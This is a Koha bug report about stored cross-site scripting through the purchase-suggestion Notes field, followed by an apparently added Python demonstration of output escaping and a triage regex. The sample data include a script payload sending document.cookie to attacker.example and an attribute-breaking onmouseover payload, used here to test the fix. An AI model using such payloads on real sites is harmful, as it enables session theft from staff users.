[Koha-bugs] [Bug 11322] New: Suggestion "notes" field should be sanitized or escaped
bugzilla-daemon at bugs.koha-community.org
Fri Nov 29 18:39:18 CET 2013
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11322
Bug ID: 11322
Summary: Suggestion "notes" field should be sanitized or escaped
Change sponsored?: ---
Product: Koha
Version: master
Hardware: All
OS: All
Status: NEW
Severity: major
Priority: P5 - low
Component: Acquisitions
Assignee: koha-bugs at lists.koha-community.org
Reporter: abl at biblos.pk.edu.pl
QA Contact: testopia at bugs.koha-community.org
It's possible for a patron to make a purchase suggestion from the OPAC with
HTML/JavaScript code within the Notes: field. Such injected JS code will be stored
in the database, and in certain circumstances (when managing suggestions in
acquisitions) it may subsequently get executed in the staff web browser.
Other suggestion fields may be affected as well, but the problem with 'notes'
is potentially more severe because it's a long field - a more elaborate "evil"
script will fit into it.
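The report above describes a stored cross-site scripting pattern: a field accepted from the OPAC is written to the database unchanged and later interpolated into staff-side markup. The following Python script is an added illustration of that pattern and of the escape-on-output fix the summary asks for; it is not Koha code (Koha is Perl with Template Toolkit) and does not reproduce the project's eventual patch. The sample notes, the `<td>` cell markup, and the function names are constructed for this example. It renders a constructed "Notes" value both verbatim and HTML-escaped, then uses the standard-library HTML parser to show which rendering still carries an element or event-handler attribute the patron controlled. A coarse triage helper for rows that were stored before any fix is included, since escaping on output does nothing about data already in the table.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample values for the suggestion "Notes" field (example data,
# not taken from any real Koha record). The first is an ordinary note; the
# other two are the kind of input the bug report warns about: one targets
# element content, the other the attribute context.
SAMPLE_NOTES = {
    "benign": "Please order the 2nd edition if possible & also the e-book.",
    "script": "Great book!<script>fetch('https://attacker.example/?c='+document.cookie)</script>",
    "attribute": '" onmouseover="alert(document.cookie)" x="',
}


def render_notes_vulnerable(notes: str) -> str:
    """Staff-side table cell that interpolates the stored field verbatim.

    This is the pattern the report describes: whatever the patron typed into
    the OPAC form becomes markup in the staff browser. (Hypothetical markup.)
    """
    return f'<td class="notes" title="{notes}">{notes}</td>'


def render_notes_escaped(notes: str) -> str:
    """Same cell, with the field HTML-escaped at output time.

    quote=True additionally escapes " and ', so the value is inert inside the
    title="" attribute as well as in element content.
    """
    safe = html.escape(notes, quote=True)
    return f'<td class="notes" title="{safe}">{safe}</td>'


class _MarkupAudit(HTMLParser):
    """Collects every start tag and attribute name a browser would see."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.attrs: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.extend(name for name, _ in attrs)


def contains_active_markup(rendered: str, wrapper: str = "td") -> bool:
    """True if the rendered cell carries anything beyond the wrapper element:
    an extra tag (e.g. <script>) or an on* event-handler attribute."""
    audit = _MarkupAudit()
    audit.feed(rendered)
    audit.close()
    extra_tags = [t for t in audit.tags if t != wrapper]
    handlers = [a for a in audit.attrs if a.lower().startswith("on")]
    return bool(extra_tags or handlers)


# Coarse pattern: anything that looks like a tag opener or an on*= handler.
_TAGLIKE = re.compile(r"<\s*/?\s*[a-zA-Z]|\bon[a-z]+\s*=", re.IGNORECASE)


def triage_stored_notes(rows):
    """Return the ids of (suggestionid, notes) rows whose note looks like
    markup, so rows stored before a fix can be reviewed by hand. This is a
    triage aid only; escaping on output is the actual defence."""
    return [sid for sid, notes in rows if notes and _TAGLIKE.search(notes)]


if __name__ == "__main__":
    for label, note in SAMPLE_NOTES.items():
        raw = render_notes_vulnerable(note)
        esc = render_notes_escaped(note)
        print(f"{label:9s} verbatim active={contains_active_markup(raw)} "
              f"escaped active={contains_active_markup(esc)}")
    rows = [(1, SAMPLE_NOTES["benign"]), (2, SAMPLE_NOTES["script"]),
            (3, None), (4, SAMPLE_NOTES["attribute"])]
    print("rows to review:", triage_stored_notes(rows))
```

The attribute payload is the reason escaping must cover quotes, not just `<` and `>`: with only angle brackets escaped, the value would still close the `title` attribute and add an `onmouseover` handler. Escaping at the template layer, rather than stripping tags on input, also keeps a note such as "2nd edition & e-book" intact and avoids having to guess every place the field is later rendered.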